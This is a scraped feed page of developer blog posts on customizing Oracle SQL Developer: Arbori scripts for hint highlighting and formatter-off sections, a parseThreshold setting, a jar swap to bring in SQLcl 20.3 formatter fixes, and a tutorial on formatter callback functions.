Quantcast
Channel: Philipp Salvisberg's Blog
Viewing all 118 articles
Browse latest View live

Highlight Hints in SQL Developer

$
0
0

Introduction

In this blog post I explain how you can configure your SQL Developer to highlight hints and distinguish them from ordinary comments. The SQL Language Reference for Oracle Database 19c defines hints as follows:

Hints are comments in a SQL statement that pass instructions to the Oracle Database optimizer. The optimizer uses these hints to choose an execution plan for the statement, unless some condition exists that prevents the optimizer from doing so.

Furthermore

A statement block can have only one comment containing hints, and that comment must follow the SELECTUPDATEINSERTMERGE, or DELETE keyword.

And here’s the syntax diagram:

You see the comment containing hints starts with a +. The syntax for a hint is simplified. string must be read as a placeholder for various hint-specific options. You find a list of officially supported hints in the SQL Language Reference.

In this blog post I covered how syntax highlighting works in SQL Developer and how to add a custom styler. If you are interested in the details, then I recommend to read this blog post first.

The Problem

A custom styler written in Arbori works with nodes provided in the parse-tree (target). However, the parse-tree does not contain whitespaces nor comments. We still have access to the source code through the parse-tree (target.input) and therefore to all comments. For example, by creating a token stream via LexerToken.parse(target.input, true) and looking for tokens of type LINE_COMMENT and COMMENT.  That’s not the problem.

The problem is, that there is no functionality to style a token. We only can style a node by calling struct.addStyle(target, node, 'MyStyle'). We cannot highlight hints with this method.

Let’s dig deeper.

The global variable struct is an instance of the CustomSyntaxStyle class. Here’s an excerpt based on the representation in IntelliJ IDEA:

The excerpt shows the complete implementation of the addStyle method. The tokens of the passed node are added to a local field named styles. This field is defined on line 33 without an access modifier and therefore it is not accessible by the Arbori program.

What can we do?

The Approach

We cannot solve the problem. Only the SQL Developer team can. But we can work around it. We can access the hidden field styles through Java reflection. Have a look at this excellent tutorial by Jakob Jenkov, if you want to learn more. We will use this approach in the Arbori program.

The Arbori Program to Highlight Hints

This Arbori program applies the style Hints for all hints within a worksheet or PL/SQL editor. I’ve tested it successfully with SQL Developer 19.2, 19.4 and 20.2.

Hints: 
  [node) sql_statements 
  -> {
    var getHints = function() {
      var LexerToken = Java.type('oracle.dbtools.parser.LexerToken'); 
      var Token = Java.type('oracle.dbtools.parser.Token');
      var tokens = LexerToken.parse(target.input, true);
      var hints = [];
      var prevToken = tokens[0];
      for (var i=1; i<tokens.size(); i++) {
        if ((tokens[i].type == Token.LINE_COMMENT || tokens[i].type == Token.COMMENT) && tokens[i].content.length > 3) {
          if (tokens[i].content.substring(2, 3) == "+") {
            var prev = prevToken.content.toLowerCase();
            if (prev == "select" || prev == "insert" || prev == "update" || prev == "delete" || prev == "merge") {
              hints[hints.length] = tokens[i];
              prevToken = tokens[i]
            }
          }
        }
        if (tokens[i].type != Token.WS && tokens[i].type != Token.LINE_COMMENT && tokens[i].type != Token.COMMENT) {
          prevToken = tokens[i];
        }
      }
      return hints;
    }

    var styleHints = function(hints) {
      var Service = Java.type('oracle.dbtools.util.Service');
      var Long = Java.type('java.lang.Long');
      var stylesField = struct.getClass().getDeclaredField("styles");
      stylesField.setAccessible(true);
      var styles = stylesField.get(struct);
      for (var i in hints) {
        var pos = new Long(Service.lPair(hints[i].begin, hints[i].end));
        styles.put(pos, "Hints");
      }
    }

    // main
    styleHints(getHints());
  }

Here are some explanations:

  • On line 2 we query the root node containing all sql_statements. As a result, we call the JavaScript on line 3 to 41 only once.
  • The main program starts on line 40. It collects all hints by calling the local function getHints() and styles them by calling the local function styleHints().
  • We populate all tokens including whitespaces and comments on line 7.
  • We add tokens (relevant comment containing hints) to the result list on line 15.
  • On line 32 we provide the invisible field styles of the struct object as variable styles with the help of the Java Reflection API.
  • On line 34 the start and end position of a token is converted to a Long value. This value identifies a token in the editor.
  • And finally we apply the style Hints to all hint tokens on line 35.

Register Style Hints

Add the the Arbori program Hints to the PL/SQL custom Syntax Rules in the preference dialog as shown below:

Save the preferences by pressing the OK button and then restart SQL Developer. This is necessary to register the new custom Style Hints.

Then, after restarting SQL Developer, open the preferences dialog again and configure the style Hints the way you want.

The Result

In the next screenshot you see a simple query with two syntactically correct hints. However, as mentioned in the introduction only the first comment containing hints is considered by the Oracle Database and therefore highlighted in red.

The second query produces the execution plan including a hint report for the first query. As you see, only the first hint full(e) is used and the second hint full(d) is ignored. The second hint is not reported. It is an ordinary comment after all.

 

The post Highlight Hints in SQL Developer appeared first on Philipp Salvisberg's Blog.


Disable Formatter for Code Sections in SQL Developer

$
0
0

In this blog post I show how you can disable the formatter for some parts of your code. IntelliJ IDEA and the Eclipse IDE use tags in comments to identify sections of code that must not be formatted. By default these tags are @formatter:off and @formatter:on.

Example

SET SERVEROUTPUT ON
--
      begin                                 for rec 
   in(select r                          .country_region
  as region ,p .                       prod_category,sum(
 s.amount_sold ) as                  amount_sold from sales
s join products p on                p . prod_id = s .prod_id
join customers cust on           cust.cust_id=s.cust_id join
times t on t . time_id =s.     time_id join countries r on
  r.country_id = cust.country_id  where  calendar_year =
     2000 group by r.country_region , p.prod_category
       order by r .country_region, p.prod_category
         ) loop if rec . region = 'Asia' then if
           rec.prod_category = 'Hardware' then
             /* print only one line for demo
                purposes */sys.dbms_output
                  . put_line ( 'Amount: '
                    ||rec.amount_sold);
                      end if;end if;
                        end loop;
                          end;
                           /
--
SELECT FISCAL_YEAR, COUNT(*) FROM SALES S 
NATURAL JOIN TIMES T GROUP BY FISCAL_YEAR ORDER BY 1;

When I format this code with SQL Developer 20.2 and the default Trivadis PL/SQL & SQL Formatter Settings (plus lowercase keywords, lowercase identifiers) the result looks like this:

set serveroutput on
--
begin
   for rec in (
      select r.country_region as region,
             p.prod_category,
             sum(s.amount_sold) as amount_sold
        from sales s
        join products p
          on p.prod_id = s.prod_id
        join customers cust
          on cust.cust_id = s.cust_id
        join times t
          on t.time_id = s.time_id
        join countries r
          on r.country_id = cust.country_id
       where calendar_year = 2000
       group by r.country_region,
                p.prod_category
       order by r.country_region,
                p.prod_category
   ) loop
      if rec.region = 'Asia' then
         if rec.prod_category = 'Hardware' then
             /* print only one line for demo
                purposes */
            sys.dbms_output.put_line('Amount: ' || rec.amount_sold);
         end if;
      end if;
   end loop;
end;
/
--
select fiscal_year,
       count(*)
  from sales s
natural join times t
 group by fiscal_year
 order by 1;

Argh, I do not want the PL/SQL block to be formatted. I spent enough time to format it manually and I want to keep it that way. Let’s add @formatter:off and @formatter:on tags to the original code like this:

SET SERVEROUTPUT ON
-- @formatter:off
      begin                                 for rec 
   in(select r                          .country_region
  as region ,p .                       prod_category,sum(
 s.amount_sold ) as                  amount_sold from sales
s join products p on                p . prod_id = s .prod_id
join customers cust on           cust.cust_id=s.cust_id join
times t on t . time_id =s.     time_id join countries r on
  r.country_id = cust.country_id  where  calendar_year =
     2000 group by r.country_region , p.prod_category
       order by r .country_region, p.prod_category
         ) loop if rec . region = 'Asia' then if
           rec.prod_category = 'Hardware' then
             /* print only one line for demo
                purposes */sys.dbms_output
                  . put_line ( 'Amount: '
                    ||rec.amount_sold);
                      end if;end if;
                        end loop;
                          end;
                           /
-- @formatter:on
SELECT FISCAL_YEAR, COUNT(*) FROM SALES S 
NATURAL JOIN TIMES T GROUP BY FISCAL_YEAR ORDER BY 1;

Now the formatter keeps the PL/SQL block as it is and formats only the rest.

set serveroutput on
-- @formatter:off
      begin                                 for rec 
   in(select r                          .country_region
  as region ,p .                       prod_category,sum(
 s.amount_sold ) as                  amount_sold from sales
s join products p on                p . prod_id = s .prod_id
join customers cust on           cust.cust_id=s.cust_id join
times t on t . time_id =s.     time_id join countries r on
  r.country_id = cust.country_id  where  calendar_year =
     2000 group by r.country_region , p.prod_category
       order by r .country_region, p.prod_category
         ) loop if rec . region = 'Asia' then if
           rec.prod_category = 'Hardware' then
             /* print only one line for demo
                purposes */sys.dbms_output
                  . put_line ( 'Amount: '
                    ||rec.amount_sold);
                      end if;end if;
                        end loop;
                          end;
                           /
-- @formatter:on
select fiscal_year,
       count(*)
  from sales s
natural join times t
 group by fiscal_year
 order by 1;

This does not work out of the box. Therefore you have to configure SQL Developer accordingly. Either by importing the latest Trivadis PL/SQL & SQL Formatter Settings (as I’ve done) or by adding an Arbori query yourself. I explain the latter in the next section.

Configure SQL Developer

To configure this solution you need SQL Developer 19.2 or later. Open the preferences dialog and go to Code Editor -> Format -> Advanced Format -> Custom Format .

Add the following Arbori query (e.g. after the dontFormatNode query). The position is not that important.

dontFormatOffOnRanges: runOnce -> {
    var Integer = Java.type('java.lang.Integer');
    var LexerToken = Java.type('oracle.dbtools.parser.LexerToken'); 
    var Token = Java.type('oracle.dbtools.parser.Token');
    var tokens = LexerToken.parse(target.input, true);  // include hidden tokens not relevant to build a parse tree
    var hiddenTokenCount = 0;
    var format = true;
    for (var i in tokens) {
      if (tokens[i].type == Token.LINE_COMMENT || tokens[i].type == Token.COMMENT) {
        if (tokens[i].content.toLowerCase().contains("@formatter:off") ||
            tokens[i].content.toLowerCase().contains("noformat start")) 
        {
          format = false;
        }
        if (tokens[i].content.toLowerCase().contains("@formatter:on") ||
            tokens[i].content.toLowerCase().contains("noformat end"))
        {
          format = true;
        }
        hiddenTokenCount++;
      } else if (tokens[i].type == Token.WS || tokens[i].type == Token.MACRO_SKIP ||
                 tokens[i].type == Token.SQLPLUSLINECONTINUE_SKIP) 
      {
        hiddenTokenCount++
      } else {  
        /* expected types: QUOTED_STRING, DQUOTED_STRING, BQUOTED_STRING, DIGITS, 
                           OPERATION, IDENTIFIER, AUXILIARY, INCOMPLETE */
        if (!format) {
          struct.unformattedPositions.add(new Integer(i-hiddenTokenCount));
        }
      }
    }
  }

Here are some explanations:

SQL Developer’s formatter class has a public field named unformattedPositions of type  Set<Integer>. It contains all token positions that must not be formatted. We just have to extend this set. However, the parse tree contains only relevant tokens. Whitespaces and comments are not relevant. But we need single-line and multi-line comments to disable and enable the formatter. That’s why we read all tokens on line 5. Now we can determine if a token should be added to the unformattedPositions on line 29. The variable i contains the current token position. The hiddenTokenCount contains the number of preceding tokens that are not part of the parse tree. i-hiddenTokenCount equates to the token position in the parse tree. The rest should be self-explanatory.

Read this post to learn more about Arbori and how the formatter works.

The post Disable Formatter for Code Sections in SQL Developer appeared first on Philipp Salvisberg's Blog.

Navigation in Large PL/SQL Code

$
0
0

Are you editing large PL/SQL code in SQL Developer? Have you noticed that sometimes you cannot navigate to a declaration anymore? No Ctrl-Click under Windows. No Command-Click under macOS. In this blog post I explain the reason and how to fix that in SQL Developer 20.2.

What Is Large?

Usually, we define the size of code using common software metrics. Here are some examples:

  • characters,
  • lines,
  • statements,
  • McCabe’s cyclomatic complexity,
  • Halstead volume or
  • maintainability index.

SQL Developer uses number of lexer tokens. For SQL Developer the magic number is 15000 lexer tokens . This is the so called parseThreshold. PL/SQL code with 15000 lexer tokens or more are considered large.

Counting Lexer Tokens

Lexer tokens are similar to words. They are used as input for the parser. In fact for parsing some lexer tokens are irrelevant. Whitespaces and comments, for instance. Here is an example:

begin
   dbms_output.put_line('Hello World!');
end;
/

This code contains the following 11 relevant lexer tokens:

  • begin (IDENTIFIER)
  • dbms_output (IDENTIFIER)
  • . (OPERATION)
  • put_line (IDENTIFIER)
  • ( (OPERATION)
  • Hello World! (QUOTED_STRING)
  • ) (OPERATION)
  • ; (OPERATION)
  • end (IDENTIFIER)
  • ; (OPERATION)
  • / (OPERATION)

I put the token type in parenthesis.

You can run the following Arbori program to print the number of lexer tokens in the SQL Developer console.

countTokens:
  [node) sql_statements
  -> {
    var LexerToken = Java.type('oracle.dbtools.parser.LexerToken'); 
    var Token = Java.type('oracle.dbtools.parser.Token');
    var tokens = LexerToken.parse(target.input, false);
    print("Number of tokens: " + tokens.size());
  }

Change parseThreshold Temporarily

The default parseThreshold is 15000. With that value the navigation to dbms_output.put_line is possible.

A link is displayed when you hold down the Ctrl key under Windows or the Command key under MacOS while you move the mouse pointer over a linkable item.

Fortunately, we don’t need to generate a larger code to see what happens when we reach the parseThreshold. We can simply set the parseThreshold to 11 by executing the following command in a separate worksheet. The database connection is irrelevant.

set hidden param parseThreshold = 11;

Now we have to enforce a re-parse. For example by cutting and pasting the code. Afterwards you should see an empty code outline window.

The parseThreshold has been reached and SQL Developer does not parse the code anymore. As a result, you cannot navigate to the declaration of dbms_output.put_line. You cannot enable the link. SQL Developer needs the parse tree for the navigation. No parse-tree, no navigation.

But it is easy to get it working again. Just remove a token. The / at the end, for instance. Now we have only 10 lexer tokens. A complete code outline is shown and code navigation works again.

Change parseThreshold Permanently

You can configure a script to be executed when opening a connection in SQL Developer.

In this script you can define a higher threshold value. A magnitude of ten higher than the default value should be sufficient for most cases.

set hidden param parseThreshold = 150000;

What’s the Impact of a Higher parseThreshold?

There is no impact, if you work with PL/SQL and SQL code with less than 15000 lexer tokens.

However, if work with larger code the code editor will need more time to open. And of course it will consume more memory. That’s the price you pay for enabling navigation in large PL/SQL code.

The post Navigation in Large PL/SQL Code appeared first on Philipp Salvisberg's Blog.

Patching SQL Developer 20.2 with SQLcl’s Formatter

$
0
0

Introduction

SQLcl 20.3.0 was released on October 29, 2020. It’s the first time I remember that we have a SQLcl version without the corresponding SQL Developer version. This is a pity because this SQLcl version also contains formatter fixes. And formatting code is something I do more often in the full-blown IDE than in the stripped down command line interface. In this blog post I show you how you can patch your SQL Developer installation and make the formatter fixes available there as well.

Disclaimer

What I do here is an experiment and most probably not really legal. It’s nothing I suggest you should do in your production environment. If you feel uneasy, don’t do it. What you do might destroy your SQL Developer installation.

Prerequisites

For this experiment you need

  • SQLcl 20.3.0
  • SQL Developer 20.2.0
  • JDK8 or JDK11

These software components are all installed on your computer. I do not explain in this blog post how to to it.

Overview

SQLcl and SQL Developer provide a db-common.jar file. This file contains the formatter (beside other things). We copy this file from the SQLcl installation to the SQL Developer installation. That would be all, if SQL Developer would load the Guava library before opening a connection. But it does not because it was not required for version 20.2 of db-common.jar. Therefore we put the VersionTracker.class (which does not use Guava) from the original SQL Developer installation into the db-common.jar file.

Step by Step Instruction

Step 1 – Quit SQL Developer

We are going to patch SQL Developer. This is not possible on Windows if SQL Developer is running. On other OS this might have strange effects. Therefore quit SQL Developer.

Step 2 – Rename SQLDev’s db-common.jar

Find the db-common.jar in your SQL Developer installation. In my case the file is in this directory: /Applications/SQLDeveloper20.2.0.app/Contents/Resources/sqldeveloper/sqldeveloper/lib. Rename this file to db-common.original.jar.


cd /Applications/SQLDeveloper20.2.0.app/Contents/Resources/sqldeveloper/sqldeveloper/lib
mv dbtools-common.jar dbtools-common.original.jar


cd C:\app\sqldeveloper20.2.0\sqldeveloper\lib
ren dbtools-common.jar dbtools-common.original.jar

Step 3 – Copy SQLcl’s db-common.jar

Find the db-common.jar in your SQLcl installation. In my case the file is in this directory: /usr/local/bin/sqlcl/lib. Copy the file to the SQLDev’s directory (where the db-common.original.jar is located).


cd /usr/local/bin/sqlcl/lib
cp dbtools-common.jar /Applications/SQLDeveloper20.2.0.app/Contents/Resources/sqldeveloper/sqldeveloper/lib


cd C:\app\sqlcl\lib
copy dbtools-common.jar C:\app\sqldeveloper20.2.0\sqldeveloper\lib

Step 4 – Patch db-common.jar

Open a terminal window and change to the directory of the db-common.original.jar file. Run there the following commands to create a patched version of db-common.jar:


cd /Applications/SQLDeveloper20.2.0.app/Contents/Resources/sqldeveloper/sqldeveloper/lib
jar -xvf dbtools-common.original.jar oracle/dbtools/db/VersionTracker.class
jar -u0vMf dbtools-common.jar oracle/dbtools/db/VersionTracker.class
rm -rf oracle


cd C:\app\sqldeveloper20.2.0\sqldeveloper\lib
jar -xvf dbtools-common.original.jar oracle/dbtools/db/VersionTracker.class
jar -u0vMf dbtools-common.jar oracle/dbtools/db/VersionTracker.class
rmdir /s /q oracle

Here some explanation:

  • First we change to the directory where the files db-common.original.jar (version 20.2.0) and db-common.jar (version 20.3.0)  are stored. In your case the directory name may differ.
  • On the second line we extract the VersionTracker.class from the db-common.original.jar file. The class is stored in a newly created directory oracle/dbtools/db.
  • On the third line we copy the previously extracted VersionTracker.class into the db-common.jar file.
  • And on the last line we remove the oracle directory and its subdirectories.

Formatter Improvements

An example is the best to show the difference between version 20.2 and 20.3. I use the default formatter settings with just one change. “No breaks” for “Line Breaks On Boolean connectors”.

And here are the result after formatting the code once.

There are two significant improvements of the formatter. Both are related to comment and whitespace handling and therefore are independent of an Arbori program.

  • The line of code after a comment is no longer indented additionally.
  • The line break after a single-line comment is no longer lost. As a result, the formatter will no longer comment out code.

While the first bug leads to badly formatted code, the second bug is really nasty. It breaks your code. This happens when you use single line comments on consecutive lines. In most cases this will lead to compile errors. However, I showed that the resulting code may be syntactically correct and a wrong formatting result could go unnoticed.

 

 

 

The post Patching SQL Developer 20.2 with SQLcl’s Formatter appeared first on Philipp Salvisberg's Blog.

Formatter Callback Functions

$
0
0

Introduction

In this blog post I explained how the formatter in SQL Developer works and outlined how you can change the formatter result using Arbori and JavaScript. In this post I explain what exactly the provided formatter callback functions do. For that I use simple examples. I produced all results with a patched version of SQL Developer 20.2. However, I expect that the results for version 20.2, 19.4 and 19.2 are the same.

Minimal Arbori Program

Before looking at the callback function, I’d like to reduce the Arbori program to the minimum. Why? Because this visualises the default behaviour of the formatter. Furthermore it will simplify the subsequent examples.

One could think about removing the entire Arbori program. But that won’t work. An empty Arbori program is an invalid Arbori program and SQL Developer will reset it to the default.

A minimal Arbori program looks as follows, the comment section explains the required parts.

/**
 * Minimal version of a custom Arbori formatter program.
 *
 * oracle.dbtools.app.Format checks if 
 *
 *    - skipWhiteSpaceBeforeNode exists
 *    - :indentConditions is used somewhere
 *
 * The Arbori program is considered invalid, if these 
 * minimal requirement are not met and it is reset 
 * to the default value.
 */

dummy:  
  :indentConditions & [node) 'dummy_node_cond' 
;

skipWhiteSpaceBeforeNode:
  [node) 'dummy_node_skip_ws_before'  
  ->
;

I use default values for all other formatter settings as the following three screenshots show.

You can see that tokens are separated by a space. A line break is added after reaching the line size limit. Keywords are changed to upper case. However, all identifiers are treated as keywords. No identifiers are changed to lower case as configured. Beside the “1-line long comments” setting no other configuration has an effect with this minimal Arbori program. In other words, the Arbori program is involved in the application of most formatter configuration settings.

Just to be clear. This Arbori program does nothing. :indentConditions is technically used in the dummyquery, but the query does not produce a result. Even if it would, it is not used anywhere. And the query skipWhiteSpaceBeforeNode looks for a non-existing node type. So the query returns no result and therefore the callback function skipWhiteSpaceBeforeNode is not called.

Callback Functions

A formatter callback function in SQL Developer has the following Java signature:

public void callbackFunctionName (
   oracle.dbtools.parser.Parsed target, 
   Map<String, oracle.dbtools.parser.ParseNode> tuple
) {...}

target contains the parse tree. And tuple contains the nodes to process. An Arbori query can return multiple columns and multiple rows. A tuple contains the columns of a single row. Therefore, a callback function is called per Arbori query result row. But what columns are expected in tuple. I have not found a document describing that. This is one of the reason for this blog post. Most of the callback functions expect a column named node. But not all of them.

Most of the formatter callback functions just populate an internal list of whitespaces before a node. Technically it is implemented as a Map<Integer, String> and is named newLinePositions. The key (Integer) is the position of a node (lexer token) in the parse tree. The value (String) contains the whitespaces before this position.

Most callback functions expect existing entries in newLinePositions. This leads to a strict execution order.

Here’s the ordered list of all callback functions. I highlighted the functions that you can call at any position in an Arbori program.

I will discuss them in the next chapters based on this example:


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
                     sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF r.salary > 2.9e3 THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/


SET SERVEROUTPUT ON BEGIN FOR R IN ( SELECT ENAME AS EMP_NAME , SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10 , 20 ) ) LOOP IF R . SALARY >
 2 . 9 E 3 THEN DBMS_OUTPUT . PUT_LINE ( R . EMP_NAME ) ; END IF ; END LOOP ; END ;
/

dontFormatNode

I start with this function, because the example contains an exponential number 2.9e3. The default formatting adds spaces around all lexer tokens. The result 2 . 9 E 3 breaks the code. I’d like to fix that first, so we are not distracted by this syntax error and can concentrate on formatting code.

This function expects a node in tuple. It identifies nodes that must not be formatted. In other words, the node keeps all its whitespaces. Behind the scenes the function adds all positions to a Map<Integer> named unformattedPositions. The serializer will ignore all positions in newLinePositions if a position exists in unformattedPositions. As a result, the position of dontFormatNode in the Arbori program is irrelevant.

In this blog post I showed how you can use dontFormatNode to ignore chosen code sections with @formatter:off and @formatter:on comments.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

dummy:  
  :indentConditions & [node) 'dummy_node_cond' 
;

skipWhiteSpaceBeforeNode:
  [node) 'dummy_node_skip_ws_before'  
  ->
;


SET SERVEROUTPUT ON BEGIN FOR R IN ( SELECT ENAME AS EMP_NAME , SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10 , 20 ) ) LOOP IF R . SALARY >
 2.9e3 THEN DBMS_OUTPUT . PUT_LINE ( R . EMP_NAME ) ; END IF ; END LOOP ; END ;
/

On line 2 you find the query condition. The -> on line 3 calls the callback function. The name of the function musts match the query name. In this case dontFormatNode. The result shows a difference on line 2. The numeric literal 2.9e3 does not contain whitespaces anymore.

indentedNodes1

This function expects a node in tuple. It’s a preparation step for indentedNodes2. Calling this function alone will not change the formatting result. It populates a Map<Integer, Integer> named posDepths. The key is the position and the value is the number of indentations. You can think of an indentation as the number of tabs, even if you use spaces for indentation.

indentedNodes2

This function expects the very same input as for indentedNodes1. It converts the number of indentations to spaces or tabs according to the formatter configuration and adds them to newLinePositions.

The Arbori program uses :indentConditions on line 8. This is a parameterless function returning a Boolean value. It’s part of the formatter and can be used in an Arbori query. :indentConditions returns true if the setting for “Line Breaks IF/CASE/WHILE” is set to “Indented Conditions and Actions” as in the following screenshot.

Here is the Arbori program and the formatting results. The first result is based on the default settings for “Line Breaks IF/CASE/WHILE” (Indented Actions, Inlined Conditions) and the second result is based on “Indented Conditions and Actions.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
  [node) 'dummy_node_skip_ws_before'  
  ->
;


SET SERVEROUTPUT ON BEGIN
    FOR R IN ( SELECT ENAME AS EMP_NAME , SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10 , 20 ) ) LOOP
        IF R . SALARY > 2.9e3 THEN
            DBMS_OUTPUT . PUT_LINE ( R . EMP_NAME ) ;
        END IF ;
    END LOOP ;
END ;
/


SET SERVEROUTPUT ON BEGIN
    FOR R IN ( SELECT ENAME AS EMP_NAME , SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10 , 20 ) ) LOOP
        IF
            R . SALARY > 2.9e3
        THEN
            DBMS_OUTPUT . PUT_LINE ( R . EMP_NAME ) ;
        END IF ;
    END LOOP ;
END ;
/

The query condition is defined on the lines 6 to 9 and is used on line 11 and 15. This change has a huge impact on the formatting result. Both results look quite good.

You also see that the Arbori program is responsible to deal with different formatter settings. To simplify the Arbori program I will ignore all other formatter settings. All further formatting results are based on :indentConditions.

skipWhiteSpaceBeforeNode

This function expects a node in tuple. It adds the starting position of the node to a Map<Integer> named skipWSPositions. The serializer will use this map and changes the default behaviour accordingly. This means it will emit no whitespace instead of a single whitespace at this node position. As a result, the position of skipWhiteSpaceBeforeNode in the Arbori program is irrelevant.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;


SET SERVEROUTPUT ON BEGIN
    FOR R IN ( SELECT ENAME AS EMP_NAME, SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10, 20)) LOOP
        IF
            R. SALARY > 2.9e3
        THEN
            DBMS_OUTPUT. PUT_LINE ( R. EMP_NAME);
        END IF;
    END LOOP;
END;
/

The formatter removed the space before ;, ,, ) and . on line 2, 4, 6, 7 and 8.

skipWhiteSpaceAfterNode

This function expects a node in tuple. It is similar to skipWhiteSpaceBeforeNode. The only difference is that it adds the end position of a node to d skipWSPositions.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;


SET SERVEROUTPUT ON BEGIN
    FOR R IN (SELECT ENAME AS EMP_NAME, SAL AS SALARY FROM EMP WHERE DEPTNO IN (10, 20)) LOOP
        IF
            R.SALARY > 2.9e3
        THEN
            DBMS_OUTPUT.PUT_LINE (R.EMP_NAME);
        END IF;
    END LOOP;
END;
/

The formatter removed the space after (, and . on line 2, 4 and 6.

identifiers

This function expects an identifier in tuple. It populates a Map<String, String> named caseIds. The key is an interval representation of a node (containing to and from position). The value contains the identifier according the formatter settings. The serializer will use this map to emit the identifiers in the configured case. newLinePositions is not used. As a result, the position of identifiers in the Arbori program is irrelevant.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;


SET SERVEROUTPUT ON BEGIN
    FOR r IN (SELECT ename AS emp_name, sal AS salary FROM emp WHERE deptno IN (10, 20)) LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

You see that the identifiers r, ename, emp_name, sal, salary, emp, dbms_output and put_line are in lowercase.

extraBrkBefore

This function expects a node in tuple. It extracts the whitespaces at the starting position from newLinePositions and adds a leading newline.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;


SET SERVEROUTPUT ON
BEGIN
    FOR r IN (SELECT ename AS emp_name, sal AS salary
    FROM emp
    WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added a newline before BEGIN on line 2, before FROM on line 4, before WHERE on line 5 and before LOOP on line 6.

extraBrkAfter

This function expects a node in tuple. It is similar to extraBrkBefore. The only difference is that it adds the end position of a node to newLinePositions.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;


SET SERVEROUTPUT ON
BEGIN
    FOR r IN (SELECT ename AS emp_name,
    sal AS salary
    FROM emp
    WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added a newline after , on line 3.

brkX2

This function expects a node in tuple. A node identifies a significant statement.

Depending on the setting for “Line Breaks After statement” one or two newlines are added to newLinePositions. For “Preserve Original” the original newline characters will be extracted from the source during serialization. “Preserve Original” means that it will also preserve missing newlines. As a result, the formatting result may differ based on the input.

“Double break” is the default.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename AS emp_name,
    sal AS salary
    FROM emp
    WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

